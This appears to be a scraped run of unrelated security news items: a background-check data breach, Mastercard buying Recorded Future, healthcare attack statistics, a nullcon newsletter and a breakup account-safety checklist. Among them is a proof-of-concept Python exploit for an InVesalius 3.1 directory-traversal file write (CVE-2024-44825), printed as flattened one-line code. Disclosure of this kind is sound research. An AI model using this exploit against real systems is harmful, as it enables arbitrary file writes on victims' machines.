A background check service called MC2 Data has leaked information of over 100 million US citizens in an unprotected online database.

A background check left a huge database unprotected online containing 2.2TB of people’s data, according to research by Cybernews.

The database was left passwordless and easily accessible to anyone on the internet by background check firm MC2 Data. MC2 Data gathers publicly available data to provide decision makers with information whether someone can rent a house, work at their firm, or be granted a loan.

The data is usually gathered from online sources like criminal records, employment history, family data, and contact details.

Just like the huge National Public Data breach, this is another example of companies that most of us have never heard having extensive databases with an enormous amount of personal data. In this case, the researchers found 106,316,633 records containing private information about US citizens.

Cybernews estimates that at least 100 million individuals are affected, meaning approximately one in three US citizens can expect to find their data in the data set.

The websites that MC2 Data operates include:

*   PrivateRecords
*   PrivateReports
*   PeopleSearcher
*   ThePeopleSearchers
*   PeopleSearchUSA

And the leaked data included:

*   Names
*   Emails
*   IP addresses
*   User agents
*   Encrypted passwords
*   Partial payment information
*   Home addresses
*   Dates of birth
*   Phone numbers
*   Property records
*   Legal records
*   Property records
*   Family, relatives, neighbors data
*   Employment history

To make things even worse, the data of 2,319,873 users who subscribed to MC2 Data services were leaked as well.

It is incomprehensible that services like these are allowed to exist without any kind of control or sense of responsibility. Regardless of all the regulations and laws these companies need to abide by, we find time and again that their security measures are below par.

As the researchers put it:

> “While background-check services keep trying to prevent such cases, they haven’t been able to stop such use of their services completely. Such a leak is a goldmine for cybercriminals as it eases access and reduces risk for them, allowing them to misuse these detailed reports more effectively.”

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identity**

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 100 million+ US citizens have records leaked by background check service 

The $2.65B buy validates the growing importance of threat intelligence to enterprise security strategies.

Source: incamerastock via Alamy Stock Photo

Mastercard's $2.65 billion acquisition of Recorded Future has focused attention on the increasing value of cyber-threat intelligence (CTI) to enterprise security strategies.

Security experts in the space perceive the deal as validating the business criticality of CTI and accelerating its mainstream adoption.

**A Multibillion-Dollar Bet**

Mastercard on Sept. 12 announced it had agreed to acquire Recorded Future for $2.65 billion — nearly equivalent to the cumulative amount it paid in nine previous purchases of cybersecurity vendors. Mastercard has said it will leverage Recorded Future's threat intelligence capabilities to bolster its own anti-fraud capabilities and to strengthen the third-party services it delivers via previous acquisitions such as RiskRecon.

The deal is expected to close in Q1 of 2025.

Fernando Montenegro, an analyst with Omdia, says Mastercard's acquisition aligns with the financial firm's efforts to integrate multiple capabilities around its suite of anti-fraud services. "One of the key components of successful anti-fraud initiatives is accurate threat intelligence, so it makes sense for Mastercard to improve their capabilities there," Montenegro says. "I think the deal shows that threat intelligence can be immensely valuable not only to pure-play cybersecurity efforts, but to broader anti-fraud initiatives as well."

The Business Research Company expects demand for cyber-threat intelligence services to hit some $11.5 billion in revenue in 2024, and to more than double to $25.68 billion in 2028, at a compound annual growth rate (CAGR) of 21.7%. The analyst firm identified the primary growth drivers as an increase in the volume and sophistication of cyberattacks, cloud adoption, a constantly expanding attack surface, and increasing regulatory pressures. Others, like Statista think the market is currently even larger — $14.59 billion in 2023 — but have a more modest annual growth rate expectation of 14.7% between now and 2030.

**Validation for CTI?**

Beenu Arora, CEO and co-founder of Cyble, sees the pending transaction as further cementing the role of threat intelligence in business strategies. The rapidly changing and increasingly sophisticated threat landscape has increased the importance of intelligence on emerging threats, threat groups, and their tactics, techniques, and procedures, Arora says. Now perceived as a highly technical component of SecOps, CTI has moved to front and center of security strategy at a growing number of organizations.

"If you speak to any seasoned CTO, CISO, or chief executive, there’s always concern about how they can make the right decisions" around what assets to protect, how, and against whom, Arora says. "Over the last 10 to 15 years, I think there has been much greater awareness with regard to how threat intelligence can sit at the center of day-to-day decision making for the business, whether that’s managing risk, safeguarding assets, or using external intelligence to help guide business decisions."

Analyst firm IT-Harvest, which maintains a dashboard tracking the performance of more than 4,050 cybersecurity vendors globally, counts 123 vendors as currently engaged in the cyber-threat intelligence space. Of that number, 63 have experienced headcount growth this year. Mastercard's recent acquisition underscores the value these vendors can bring to enterprise security strategies, says Richard Stiennon, chief research analyst at IT-Harvest.

"I think the acquisition is good for the 122 other threat intelligence vendors whose prospects will improve in the eyes of investors," Stiennon says.

The $2.65 billion that Mastercard has agreed to pay for Recorded Future is roughly 6.5 times the latter's annual revenue run rate. While that valuation is less than the 10-times valuations that cybersecurity firms garnered back in 2021 and 2022, it still is a healthy number, Stiennon says.

Many of the organizations that deliver CTI services, such as Recorded Future, Group-IB Flashpoint, and Digital Shadows, are what might be regarded as pure-play vendors in the space. Others, such as Mandiant, CrowdStrike, Kaspersky, IBM X-Force, Cisco Talos, and Palo Alto Networks, deliver threat intelligence as part of a broader portfolio of security services. All these vendors use a combination of open source intelligence (OSINT) and information from proprietary sources to deliver their CTI feeds.

"The acquisition validates the widespread, growing recognition that threat intelligence is no longer a complement to an organization's security posture," says Josh Lefkowitz, founder and CEO of Flashpoint. Organizations and government agencies are using threat intelligence to combat ransomware, protect data, lock down supply chains, prioritize critical vulnerabilities, and protect their people and assets.

"I’m constantly speaking with security leaders at organizations that consider these applications of threat intelligence critical to their daily operations," Lefkowitz notes.

He adds that Mastercard's Recorded Future purchase is bringing attention to the board level of the business criticality of CTI.

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa, and forced to spend the night in jail — just for doing their pen-testing jobs. Listen now!

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Mastercard's Bet on Recorded Future a Win for Cyber-Threat Intel

Healthcare organizations face a 32% surge in cyberattacks, with sensitive patient data being sold on the Dark Web.…

Healthcare organizations face a 32% surge in cyberattacks, with sensitive patient data being sold on the Dark Web. Hospitals worldwide are vulnerable, as cybercriminals exploit weak defenses and digital health records.

A new report has revealed a troubling trend: healthcare organizations across the globe are falling victim to increasingly **sophisticated cyberattacks**, leaving patients and patients’ families vulnerable to financial gain.

According to recent data from Check Point Research, the global weekly average number of attacks per organization within the healthcare industry has increased by 32% over the same period last year, reaching a staggering 2,018 per week.

The targeted institutions, including vulnerable hospitals, are constantly under the triple threat of cybercrime such as ransomware attacks, data theft, and even selling access to these critical healthcare networks on the dark web.

A closer look at the data reveals that around the world, the top regions of attack are:

****The Asia-Pacific (APAC)****

The Asia-Pacific (APAC) region has suffered the most from these attacks. With 4,556 weekly attacks per organization, a 54% increase, this region is responsible for the majority of healthcare cyberattacks, driven by the rapid expansion of digital health records and telemedicine.

****Latin America****

Latin America also faced a substantial increase in these attacks. With 2,703 weekly attacks per organization, a 34% increase, this region is particularly vulnerable due to weaker regulations and underfunded cyber security initiatives.

****Europe****

According to Check Point’s **report**, Europe, despite experiencing fewer weekly attacks at an average of 1,686, saw the largest percentage increase at 56%, highlighting a growing reliance on digital tools without parallel investments in security.

****North America****

North America, with 1,607 weekly attacks and a 20% increase, remains a prime target due to the wealth of sensitive patient data and established digital infrastructure.

The impact of these cyberattacks is severe. The situation is serious enough that the World Health Organization (WHO) has called for caution, declaring 17 September **World Patient Safety Day** to highlight the risks associated with cyberattacks in the healthcare industry.

On the other hand, cybercriminals are also using ransomware-as-a-service (RaaS) to target healthcare organizations, partnering with others to carry out attacks and siphoning off sensitive data.

A real-life example, according to Check Point, involves a hacker known as Cicada3301, who posted an advertisement on a Russian-language underground forum offering ransomware-as-a-service. He demands a 20% commission on successful attacks and even provides negotiation mechanisms for disputes among partners.

To mitigate these risks, healthcare organizations must adopt comprehensive cybersecurity measures, including technological solutions, employee training, and improved security policies. Key steps include using anti-ransomware solutions, regularly backing up data, segmenting and limiting access to information, educating staff on recognizing cyber threats, installing updates and patches, and ensuring strong passwords and multi-factor authentication.

Compliance with national and international privacy standards and regulations is also important to ensure patient safety. By securing all devices and using the best security solutions, healthcare organizations can better protect themselves against cyber criminals and protect the well-being of their patients.

1.  **7TB of Healthcare Data Leak Affects 12 Million Patients**
2.  **AI in Healthcare: ChatGPT Helps Diagnosis After Doctors Fail**
3.  **8220 Gang Targets Healthcare in Global Cryptojacking Attack**
4.  **Chinese Malware Targets European Healthcare via USB Drives**
5.  **PData of 75,000 people exposed in HealthCare.gov system hack  
    **

Dark Web Sales Fuel 32% Increase in Global Healthcare Cyberattacks

Proof of concept python3 code that creates a malicious payload to exploit an arbitrary file write via directory traversal in Invesalius version 3.1. In particular the exploitation steps of this vulnerability involve the use of a specifically crafted .inv3 (a custom extension for InVesalius) that is indeed a tar file file which, once imported inside the victim's client application allows an attacker to write files and folders on the disk.

    # Exploit Title: Invesalius 3.1 - Arbitrary File Write using Directory Traversal # Discovered By: Riccardo Degli Esposti (partywave)# Exploit Author: Riccardo Degli Esposti (partywave)# Vendor Homepage: https://invesalius.github.io/# Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius# Version: from 3.1.99995# Tested on: Windows# CVE-ID: CVE-2024-44825import tarfileimport osimport zipfile# Disclaimer:# Tested on Windows# edit every [CHANGEME] before run this script# Step 0: Setup local paths# Adapt your pathszip_file_path = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME].zip'extracted_folder = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME]'output_tar = 'C:\\users\\[CHANGEME]\\downloads\\local-output.inv3'main_plist_path = os.path.join(extracted_folder, 'main.plist')# Ensure the extraction directory existsos.makedirs(extracted_folder, exist_ok=True)# Step 1: Extract the ZIP filewith zipfile.ZipFile(zip_file_path, 'r') as zip_ref:    zip_ref.extractall(extracted_folder)with open(main_plist_path, 'r') as file:    main_plist_content = file.read()# POC of loading new XMLmain_plist_content = main_plist_content.replace(    '<string>ProMED CT 0051</string>',     '<string>This is a confirmation modifying the XML</string>')with open(main_plist_path, 'w') as file:    file.write(main_plist_content)# Step 3: Create the tar archive# Adapt where you want writedef rename(tarinfo):    tarinfo.name = "..\\..\\[CHANGEME]\\" + tarinfo.name    return tarinfowith tarfile.open(output_tar, "w:xz") as tar:    for root, _, files in os.walk(extracted_folder):        for file in files:            full_path = os.path.join(root, file)            arcname = os.path.relpath(full_path, extracted_folder)            tar.add(full_path, arcname=arcname, filter=rename)output_tar

Invesalius 3.1 Arbitrary File Write / Directory Traversal

The Call For Papers for nullcon Goa 2025 is now open. Nullcon is an information security conference held in Goa, India. The focus of the conference is to showcase the next generation of offensive and defensive security technology. It will take place March 1st through the 2nd, 2025.

Do you wish to become a speaker at Nullcon Goa 2025? The opportunities are endless. The time to think is long gone - Take the only leap to share your research with our infosec community.

Call For Papers - Nullcon Goa 2025 (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0g3gVDYW7lCdLW6lZ3krW5sVJnn2b1pGgW4VfGFw4gSKwKW7T9v298lCB3rW3MyVZN4QZdRZVmt5bS5SZh7_W1gd6mX1JJnTgW3T-ygY70DWZQN8BqbRky-cK7N78QdcBNhhTdW4S5D_934wdgsW5g4QSF1XLcrBW3xm9qY5Fq0K7W29YBzm5FFJZqW1DbVDt8_D4C-W32Tv4x5mwwtFW3G8VF11yBc2DW2_C3z-89wwR2W44r2CW30gPzPW1LCpQB3TC7rDN2_4JXml3TQNW2sxvNm5d4LyqW91kdFY8BF16dW6B3Ycm8XSXV4W7G9dPx4GkwKZf8kv1DK04 )

OPEN...Call For Papers (CFP) for Nullcon Goa 2025

Do you wish to become a speaker at Nullcon Goa 2025? The opportunities are endless. The time to think is long gone - Take the only leap to share your research with our infosec community.

CFP Closes: 15th November 2024

Conference: 1st-2nd March 2025

Venue: BITS, Goa

Submission Topics (but not limited to):

- IoT/Embedded Security/OT  
- Web Applications / AI Security  
- Browser Security  
- Fuzzing & Exploit Development  
- Bug Hunting and Vulnerability Research  
- Forensic  
- Malware & Incident Response  
- Cloud and Infrastructure Security

Know More About Speaker Benefits / Submission Guidelines  
(https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0g3gVDYW7lCdLW6lZ3krW5sVJnn2b1pGgW4VfGFw4gSKwKW7T9v298lCB3rW3MyVZN4QZdRZVmt5bS5SZh7_W1gd6mX1JJnTgW3T-ygY70DWZQN8BqbRky-cK7N78QdcBNhhTdW4S5D_934wdgsW5g4QSF1XLcrBW3xm9qY5Fq0K7W29YBzm5FFJZqW1DbVDt8_D4C-W32Tv4x5mwwtFW3G8VF11yBc2DW2_C3z-89wwR2W44r2CW30gPzPW1LCpQB3TC7rDN2_4JXml3TQNW2sxvNm5d4LyqW91kdFY8BF16dW6B3Ycm8XSXV4W7G9dPx4GkwKZf8kv1DK04 )

Nullcon Bangalore 2024

Learn Via Experiences, Not Just Books

Do you know what today’s cutting-edge tech jobs at major companies truly require?

It’s all about the hands-on expertise you’ve developed—through the projects you’ve undertaken and the practical knowledge needed to address real-world business challenges.

Dates: 7th-9th November 2024 | Venue: Hotel Royal Orchid, Bangalore

Hacking Modern Web Apps: Master the Future of Attack Vectors

By Anirudh Anand & Abraham Aranguren

Malware Analysis 0x65: Dissecting & Demystifying Attackers Mindset

By Abhinav Thakur & Niraj Shivtarkar

Practical IoT Hacking

By Hemant Sonkar, Ranit Pradhan, Pugal Selvan & Rupesh Surve

StealthOps: Red Team Operations 24 Edition

By Manish Gupta & Yash Bharadwaj

Sold Out! AI Security: Terminating The Terminator

By Nikhil Joshi

Register with Early Bird Discount!  
(https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0z3gVDYW7Y8-PT6lZ3pcW5Z_6zg6bPGw2N6gYMkp15jT0W94QVDk5P5PGyW3BDWFv8GSrP3W72QF1V8zzkJNW72brp-6RfrTGW7F0XXD8X5WVcVQfWd_4HT-BxW1m36Rn7gDN4zW47VSWV8yk5TPN667G5NY2gy8W68yBjv4PZ9THW8rPGRk5k34v2W2KnQWS8y9qwDVPwXGw95657DW8xQm9N1LRLCMN3-7DJW3WTcGW4cdvMh89YnKQW6yx1R52qBcnPW10Yff22vQrxhW7x0pkw35WfrrN7tnpf5GJMDfW9dmylv4bzq_6W16R0NG98-VTfW3mXFMM77D_mNW8HbkFz30psD8f7kC9fg04 )

Job Openings 💼

Evernorth Health Services is looking for a Cyber Security Senior Advisor (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0z3lcq-W7Y8-PT6lZ3mKVxYnF46myHbmVmLD9799wBlpW3V-q831YL_kjW6mZcrB1_s4MmVddB_T60XB9QW7tCfZ13Rd87YW6yYyk-4rqZrqW7XZc046p4cynW1HYc_Q788LnWW60HDdD3VJq12W4CJys-8r4d8dW6YjvF25hsLpmW8xPbw63Z14grW51l1tj3NRGpqW4t6HCC8wl_JdW87p0H610_QYZW2nYpRK88rGG8W2Tvq145BNTtYW7t0Hqr1lmbz3W7Gp8Yt3w6F4qW1xPB-28bMCxqVJm8ZP6Zs0mqW5gP7mz9dl99XN1N1pB2ftxQ3W7c_Hg75vtHfYVXdncG5_P77pf2LHb7g04 ) and a Cyber Security Associate Principal (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0z3lcq-W7Y8-PT6lZ3q7W69Cbdx3b0ZPmN1txRLMr9jfGW8YlfXJ1t2SZbW7jqJs02dS2jYW3lB4Tf2H7CdyW8cKyQr2xJjkdW4ssmfL7d5VzZW1jCqVN3sT8STN3ggNMXxz7CyW1QMJl43BNt8_W6wds4T8BTMsVVtkX2812bpl_W5TGFq43tyJ14W5QN2MZ8gWVPfW6RGlK55JkqxgW3zBXk38Yh9JFW1B4LC76pT6GvW4Gg4YR7Ht5yVW7SsDDh2Cf737My2j9mKT9PfW8sj_1-4cpFbXW1_R_5y3nmwcBN2flG7Qs29d0W3DHv8f6018g2W47lJ1m5NB8dfW78qmSX3lK69Hd5c1WH04 ) in Hyderabad, India

Google is looking for a Security Engineer, Android Security Assurance (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyk_H5jMY8W69t95C6lZ3pgW7CTQgt6mr-qhW6jgM7f1-TYgNW37sGhY6Fw_MhW3W5hJT3q8xHNW7Dshmj63jCQfMBf7qFzVDkGV1Nwnq1GnCRDW53kp827KkSHjW4kSz1b8DYx2KW33j2fs8ZVDgVW6Ksb1-8_BL3XW4p38gd23RL8lW8Rxnqg1x39n4W8grlTQ89hWP9W7BMh8L22G3RGW72X6Xh7glvrQW1GrZn127P4BlW6ldgZ72C4z86W6f-mJf4sGn7BW84VW45328XTZW7mHvgT82H0HvW7fg1jB43mhcLW6-Vfwl28QHmsW3x1pKc88p20dW3XT4xj1yH5f5W37d9Cp2lWLKgW9612FS8_SBfpW5RwJSL7xH16WW4kzq758RwLFSW5S-KcT7J59fNN9kkyZKPF3VfW7T37gM6tYfQDW3bCHmt4S12ZtV6zTbL4L3yr5W3J9mvh4pvbFmW4gVFgc8BwKzFf7w0CsC04 ) in Bangalore, India

InfoSec Connect 👥

null - The Open Security Community is preparing for its upcoming elections! Submit your questions for potential candidates via GitHub: https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyk_45jMY8W50kH_H6lZ3nvN6Xjl9sXkG90W2YkM_32MTqcxW1GZ2sN4wrQnSW2MGhLx1HYpzyW3gNZtH6T485gVknDzC25Sd7qN6b5t28nrKr4W3gpbhd3nwn5WV96_Nm3wmknhVMX33f2FSw14W5Dq1c75rZTHrW1BKqQT226pSDW2c8B5x16ZcJlW3Kbsyq7g5h-nW8cxfDh1Z1skqW1-QxmT2TkctBW4lCMsm1JCJKmW2MqFJL6V9f0cW5pTyB58RPzhqVRSzQw4g7L1CW4r5ZPQ86cV4wW1rJR6-59ZLWtW6VbG5L6-nMrwW2mNc4H8mM6mQW4GGGP131VbgPW3yWQRh7nTz3DW6QBMq33CSHM7W1dSpvK4tR352W8G30__4P4bgyW6s00nG1lcZyZW69VQJr1j0W5WW1bz5KK62QJstf29fj5P04 (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyk_45jMY8W50kH_H6lZ3nvN6Xjl9sXkG90W2YkM_32MTqcxW1GZ2sN4wrQnSW2MGhLx1HYpzyW3gNZtH6T485gVknDzC25Sd7qN6b5t28nrKr4W3gpbhd3nwn5WV96_Nm3wmknhVMX33f2FSw14W5Dq1c75rZTHrW1BKqQT226pSDW2c8B5x16ZcJlW3Kbsyq7g5h-nW8cxfDh1Z1skqW1-QxmT2TkctBW4lCMsm1JCJKmW2MqFJL6V9f0cW5pTyB58RPzhqVRSzQw4g7L1CW4r5ZPQ86cV4wW1rJR6-59ZLWtW6VbG5L6-nMrwW2mNc4H8mM6mQW4GGGP131VbgPW3yWQRh7nTz3DW6QBMq33CSHM7W1dSpvK4tR352W8G30__4P4bgyW6s00nG1lcZyZW69VQJr1j0W5WW1bz5KK62QJstf29fj5P04 ) . Your feedback will help shape the future leadership of null.

Join our Discord Server 👋

Stay updated on the latest job announcements and opportunities in our community: https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0g3lcq-W7lCdLW6lZ3mSN1rYPzdwB9mRW8bnZP19gYljkW61XSF-5lbBSDW9kRgZ5783hndW7SQScW9dHfnWW24cg8-7g1k4tW5MTCDT39Z25lW6B9t5D3bQFsyW8DLY3H62sFsJN6H1_wpzsHKwW1y0WS-2wXgQTW2HQqNr6nlrmQW7HTlkS2blydMN8G5hm1QFTtVN1_hWxtMsgwfW3T9hgM6W-77GW7F6HKs2_y5v6W52Pvs334vlqGW7R9pjv3hSK7RW5jH-pH6bx5tJW7JzvfR3pTj-vW8MP7m21-hdg5W8j5w9p3Hp3HcW3k67C68Fjz63f5xvHfF04 (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0g3lcq-W7lCdLW6lZ3mSN1rYPzdwB9mRW8bnZP19gYljkW61XSF-5lbBSDW9kRgZ5783hndW7SQScW9dHfnWW24cg8-7g1k4tW5MTCDT39Z25lW6B9t5D3bQFsyW8DLY3H62sFsJN6H1_wpzsHKwW1y0WS-2wXgQTW2HQqNr6nlrmQW7HTlkS2blydMN8G5hm1QFTtVN1_hWxtMsgwfW3T9hgM6W-77GW7F6HKs2_y5v6W52Pvs334vlqGW7R9pjv3hSK7RW5jH-pH6bx5tJW7JzvfR3pTj-vW8MP7m21-hdg5W8j5w9p3Hp3HcW3k67C68Fjz63f5xvHfF04 )

Payatu Technologies Pvt Ltd., Office No. 502, Tej House, 5th Floor, 5 M.G. Road, Camp, Pune, Maharashtra 411001

Unsubscribe (https://hs-7328024.s.hubspotstarter.net/preferences/en/unsubscribe?data=W2nXS-N30h-BrW3LHlhC34rt-5W2qSxDn2q_nGsW2nTBZy1-XBPFW3DXWqr3Z-_tCW2WqQ3730GyvSW1S2hF03835hXW2YyfNm3JSNdZW2zYXgc24WzKdW2Pvm-h4fsmRdW43F1K13M62zMW2RrG9Z2Wy8kHW4mbnlg3dsp0fW4pyH862313-zW1Bczj53T5WDMW4mytFw45XcXLW3jdkps3_YkSJW32xGwS1ZqWrgW4pB1tk4rvDxMW3QRD2L4tFmCcW3z2X5n4cKGJ8W1_jPkL3DYJ5pW1L7shZ3yXrT1W3gs6ks2HFWFSW4mGpm92TMWDSW32rKK32sVklYW2zPb-71Lmv6XW2CqPVY3T47WMW2sT7Py49TPG1W2RJTzl4mtnMjW1Zgz8l4ftc1FW3XyTv52KSvkzW30c2cn2-g8DjW2sFqnF3Vz5zYW2Ry1N61Ljfl0W3K6FDF1BDJp3W2KZkNq3bcfRYW41tWSP1L3Gn_W49tXYY3ggbJZW2TjQnn3f-nvYW4mrF_s4fnXVLW1ZljCP2qVBl7W3W2mYG4fr5PdW2TzZDB36Fsy4W4cPR5w2PsLMfW3dppWB4mstSlW47wtPz1_nZN9W3H6XWj3C89-df1ZvBy304&_hsenc=p2ANqtz-_4kDnRpYLE-TWAHbI6iNAV0yfG-pGLSCVy_UhGcPYKKegnkWd5NrsrumPiy2SzOiKwRWd8iI3lUz1brTj75EqS1ofT1uSnLYe5ip-U8gHYAz8qiaI&_hsmi=325820415 )  
Manage preferences (https://hs-7328024.s.hubspotstarter.net/preferences/en/manage?data=W2nXS-N30h-BrW3LHlhC34rt-5W2qSxDn2q_nGsW2nTBZy1-XBPFW3DXWqr3Z-_tCW2WqQ3730GyvSW1S2hF03835hXW2YyfNm3JSNdZW2zYXgc24WzKdW2Pvm-h4fsmRdW43F1K13M62zMW2RrG9Z2Wy8kHW4mbnlg3dsp0fW4pyH862313-zW1Bczj53T5WDMW4mytFw45XcXLW3jdkps3_YkSJW32xGwS1ZqWrgW4pB1tk4rvDxMW3QRD2L4tFmCcW3z2X5n4cKGJ8W1_jPkL3DYJ5pW1L7shZ3yXrT1W3gs6ks2HFWFSW4mGpm92TMWDSW32rKK32sVklYW2zPb-71Lmv6XW2CqPVY3T47WMW2sT7Py49TPG1W2RJTzl4mtnMjW1Zgz8l4ftc1FW3XyTv52KSvkzW30c2cn2-g8DjW2sFqnF3Vz5zYW2Ry1N61Ljfl0W3K6FDF1BDJp3W2KZkNq3bcfRYW41tWSP1L3Gn_W49tXYY3ggbJZW2TjQnn3f-nvYW4mrF_s4fnXVLW1ZljCP2qVBl7W3W2mYG4fr5PdW2TzZDB36Fsy4W4cPR5w2PsLMfW3dppWB4mstSlW47wtPz1_nZN9W3H6XWj3C89-df1ZvBy304&_hsenc=p2ANqtz-_4kDnRpYLE-TWAHbI6iNAV0yfG-pGLSCVy_UhGcPYKKegnkWd5NrsrumPiy2SzOiKwRWd8iI3lUz1brTj75EqS1ofT1uSnLYe5ip-U8gHYAz8qiaI&_hsmi=325820415 )

nullcon Goa 2025 Call For Papers

The internet has made breaking up a lot harder. The Modern Love Digital Breakup Checklist can help you separate locations, accounts, and more.

Breaking up is hard to do. The internet has made it harder.

With couples today regularly sharing access to one another’s email accounts, streaming services, social media platforms, online photo albums, and more, the risk of a bad breakup isn’t just heartache. Equipped with unfettered access into sensitive, shared online accounts, a vindictive ex could track someone who is actively using services like DoorDash, Uber, or Airbnb, spy on someone through a Ring doorbell, raise the temperature on a Nest thermostat, or shout obscenities through a baby monitor.

As every relationship is different, there’s no one-size-fits-all solution to safely disentangling your digital life from your ex, but there are a few rules that can make the process easier.

And, because this can be a lot of work, here are a few things that can help you along the way:

*   A password manager that will help you create and store unique passwords for each online account.
*   The use of multifactor/two-factor authentication on every sensitive account that allows it.
*   A friend who can go through these exercises side-by-side with you.

Further down is a more comprehensive checklist of many considerations you can take in separating your digital life from your ex, but, here’s a quick, handy guide:

It’s important to remember that this work won’t be completed in a day. That’s entirely okay. Instead of trying to accomplish everything in one weekend, prioritize the most sensitive work—cutting off access to email accounts, online banking, shared photo albums, social media, and any services or apps that can reveal your location.

As Malwarebytes recently discovered in research conducted this year, 56% of people in committed relationships in the United States agreed that they “would like to see more guidance on how to handle shared logins, accounts, and apps in a relationship or during a breakup,” and 45% agreed that they “would have a hard time knowing where to begin if I no longer wanted to share location-based apps or services with my partner or in the event of a breakup.”

We hope this digital breakup checklist, which is not comprehensive, can provide some of that guidance.

Here is the Modern Love Digital Breakup Checklist.

*   Log out of personal accounts on shared devices, including laptops, tablets, e-readers, smartphones, smart TVs, and Internet of Things devices. This includes:
    
    *   Email, social media, and online banking accounts on shared tablets, computers, and smartphones.
    
    *   Email, social media, and online banking accounts on the shared devices of children/the entire family.
    *   Entertainment accounts (Hulu, Netflix, Disney+, Spotify, etc.) on smart TVs and streaming devices such as Roku, Google Chromecast, Apple TV, etc.
*   Remove your ex’s accounts from any device you share that you will maintain ownership of after the breakup. Here’s are guides on how to remove someone from:
    
    *   Windows device
    
    *   Mac device
    *   Android devices

*   For shared accounts where you and your ex had one set of login credentials, log out of those shared accounts on your own device.
*   If you want to continue using those services, create a new personal account with a unique password.

**3\. **Review personal accounts****

*   Before resetting passwords, check the recovery settings on your personal account to ensure that any attempts to reset your password will be sent to your personal email account and not to an email account owned by your ex.
*   Before resetting passwords, consider using a password manager to help create, store, and remember unique passwords for each account.
*   Reset and create unique passwords for sensitive accounts, including:
    
    *   Email accounts
    
    *   Online banking and financial accounts (Chase, Wells Fargo, Venmo, PayPal, Zelle, Cash App, etc.)
    *   Online shopping accounts (Amazon, Etsy, Shein, Temu, etc.)
    *   Social media accounts (TikTok, Instagram, Facebook, etc.)
    *   Shared cloud accounts for photos (Google Photos, iCloud)
    *   Shared cloud accounts for file storage (Dropbox, Box, etc.)
    *   Streaming entertainment accounts (Netflix, Disney+, Hulu, Spotify, Apple Music, etc.)
    *   Parental monitoring apps (Life360, Bark, Qustodio)
    *   Online forums and chat services (Reddit, Discord, etc.)
*   Reset and create unique passwords for accounts that can expose your location to users who are logged into the same account, including:
    
    *   Food and grocery delivery apps (Uber Eats, DoorDash, Postmates, etc.)
    
    *   Ride-sharing apps (Uber, Lyft, etc.)Vacation rental apps (Airbnb, Vrbo, etc.)
    *   Health and fitness tracking apps (FitBit, Strava, etc.)
    *   Connected apps for modern cars with anti-theft location tracking
*   Enable multifactor authentication on sensitive accounts and accounts that can expose your location, when provided as an option.

**4\. **Review/remove your signed-in devices****

*   Check your security settings in your online accounts to review what devices are currently logged into the same account. If you see a device that does not belong to you, force that device to be logged out.
    
    *   If you take this step after successfully resetting your password, those devices will be required to use the new password (which only you should know).
    
    *   These settings can often be found in “security” or “privacy and security” tabs in most apps.

**5\. **Review the location settings of your device****

*   Your device provides a way to comprehensively turn off **all** location services that apps rely on to function. With this feature turned off, location-based apps (such as Uber, Uber Eats, Airbnb, Yelp, Maps, etc.) will still function, but you will need to input your address and location manually each time you use the service.
    
    *   You can review location sharing settings on iPhone here.
    
    *   You can review location sharing settings on Android here.

**6\. **Review “Find My/Find My Device” settings****

